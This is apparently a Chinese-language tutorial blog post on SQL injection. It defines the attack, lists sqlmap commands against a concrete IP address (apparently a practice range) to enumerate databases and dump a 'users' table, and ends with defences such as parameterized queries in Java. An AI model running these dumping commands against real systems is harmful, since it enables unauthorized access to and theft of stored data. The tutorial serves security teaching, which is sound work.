网络安全-SQL注入

目录

SQL注入的定义

SQL注入的利用

自动化工具SQLMAP

靶场、实战练习

Bugku平台

SQL注入防御

输入验证

参数化查询


SQL注入的定义

SQL注入是一种常见的网络安全攻击技术,攻击者通过在用户输入的数据中插入恶意的SQL代码,欺骗后端数据库执行非预期的操作。这种攻击通常发生在应用程序未对用户输入进行充分验证或过滤的情况下,导致数据库被非法访问、篡改或泄露敏感信息。

SQL注入的利用

自动化工具SQLMAP

基础用法

复制代码
python sqlmap.py -u URL

示例:

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport

--dbs 查看数据库

示例:

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport --dbs

-D 指定对应数据库(如果没有则不用指定)

--tables 查看对应数据库名(如果没有则不用指定)的所有表

示例

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport --tables -D dbname

-T 指定对应表

--columns 查看对应表的所有列名

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport -T users --columns

--dump 列出所有值 可指定具体到列,也可以直接指定表,将表的内容都显示出来

示例:

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport -T users -D dbname --dump

靶场、实战练习

Bugku平台

Bugku 2023 HackINI Virtual Shop-CSDN博客

SQL注入防御

输入验证

Web应用防火墙WAF

参数化查询

使用参数化查询(预编译语句)是最有效的防御方法。

例如在Java中使用PreparedStatement:

java 复制代码
String query = "SELECT * FROM users WHERE username=? AND password=?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, username);
stmt.setString(2, password);
 
相关推荐
Logic1012 小时前
《Mysql数据库应用》 第2版 郭文明 实验4 视图和索引的构建与使用核心操作与思路解析
数据库·sql·mysql·学习笔记·计算机网络技术·形考作业·国家开放大学
破刺不会编程2 小时前
ubuntu环境下mysql的安装
数据库·mysql
合方圆~小文2 小时前
变焦摄像头画面时间戳同步方案
数据结构·数据库
QQ12958455042 小时前
SSAS-检查字段里的不可见字符
数据库·数据仓库·数据分析
dblens 数据库管理和开发工具2 小时前
DBLens for MySQL | MySQL 数据库管理和开发工具
数据库·mysql·mysql数据库管理和开发工具
廋到被风吹走2 小时前
【数据库】数据库选型
数据库
Ling_Ze2 小时前
mysql和postgressql数据库在服务器中容器创建和工具连接
服务器·数据库·mysql
vortex52 小时前
浅谈Linux文件读取类漏洞的额外攻击面
linux·安全·web安全
云 祁2 小时前
Spark SQL 深度优化实战指南:从原理到生产的完整方法论
大数据·数据库·分布式·sql·spark